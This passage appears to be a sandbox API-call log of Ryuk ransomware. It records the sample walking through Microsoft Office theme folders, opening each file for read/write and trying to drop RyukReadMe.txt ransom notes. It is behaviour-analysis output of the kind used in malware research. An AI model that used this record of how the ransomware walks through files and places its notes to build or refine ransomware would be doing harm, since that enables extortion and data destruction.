dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.548] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.548] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.548] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.548] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.548] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml", dwFileAttributes=0x80) returned 0 [0135.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\foundry.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.548] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.548] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.548] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.548] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.549] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml", dwFileAttributes=0x80) returned 0 [0135.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grayscale.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.549] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.549] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.549] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.549] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.550] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml", dwFileAttributes=0x80) returned 0 [0135.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grid.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.550] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.550] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.550] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.550] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.550] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml", dwFileAttributes=0x80) returned 0 [0135.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\hardcover.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.550] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.550] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.550] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.550] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.551] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml", dwFileAttributes=0x80) returned 0 [0135.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\horizon.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.551] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.551] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.551] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.551] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.551] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml", dwFileAttributes=0x80) returned 0 [0135.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\median.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.551] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.551] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.552] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.552] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml", dwFileAttributes=0x80) returned 0 [0135.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\metro.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.552] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.552] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.552] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.552] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml", dwFileAttributes=0x80) returned 0 [0135.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\module.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.553] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.553] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.553] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.553] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml", dwFileAttributes=0x80) returned 0 [0135.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\newsprint.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.554] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.554] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.554] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.554] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml", dwFileAttributes=0x80) returned 0 [0135.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\opulent.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.554] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.554] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.554] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.554] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml", dwFileAttributes=0x80) returned 0 [0135.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\oriel.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.555] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.555] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.555] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.555] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.555] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml", dwFileAttributes=0x80) returned 0 [0135.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\origin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.556] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.556] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.556] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.556] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml", dwFileAttributes=0x80) returned 0 [0135.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\paper.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.556] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.556] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.556] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.556] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.557] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml", dwFileAttributes=0x80) returned 0 [0135.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\perspective.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.557] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.557] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.557] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.557] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.557] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml", dwFileAttributes=0x80) returned 0 [0135.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\pushpin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.557] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.557] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.558] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.558] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.558] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml", dwFileAttributes=0x80) returned 0 [0135.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\slipstream.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.558] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.558] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.558] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.558] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.558] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml", dwFileAttributes=0x80) returned 0 [0135.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Solstice.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\solstice.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.559] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.559] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.559] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.559] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml", dwFileAttributes=0x80) returned 0 [0135.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Technic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\technic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.560] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.560] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.560] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.560] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.560] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml", dwFileAttributes=0x80) returned 0 [0135.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\thatch.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.560] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.560] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.560] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.560] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml", dwFileAttributes=0x80) returned 0 [0135.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\trek.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.561] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.561] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.561] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.561] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml", dwFileAttributes=0x80) returned 0 [0135.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\urban.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.561] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.561] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.561] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.561] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml", dwFileAttributes=0x80) returned 0 [0135.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\verve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.564] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.564] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.564] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.564] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.565] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml", dwFileAttributes=0x80) returned 0 [0135.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\waveform.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.565] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.565] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.565] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0135.565] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0135.566] SetLastError (dwErrCode=0x0) [0135.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.568] GetLastError () returned 0x5 [0135.568] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0135.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.568] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.568] SetLastError (dwErrCode=0x0) [0135.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.568] GetLastError () returned 0x5 [0135.568] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0135.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.569] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0135.570] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.571] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.571] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx", dwFileAttributes=0x80) returned 0 [0135.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.572] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.572] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.572] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.572] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx", dwFileAttributes=0x80) returned 0 [0135.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.573] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.573] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.573] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.573] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.573] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx", dwFileAttributes=0x80) returned 0 [0135.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.573] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.573] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.573] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.573] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.574] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx", dwFileAttributes=0x80) returned 0 [0135.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.574] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.574] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.574] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.574] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 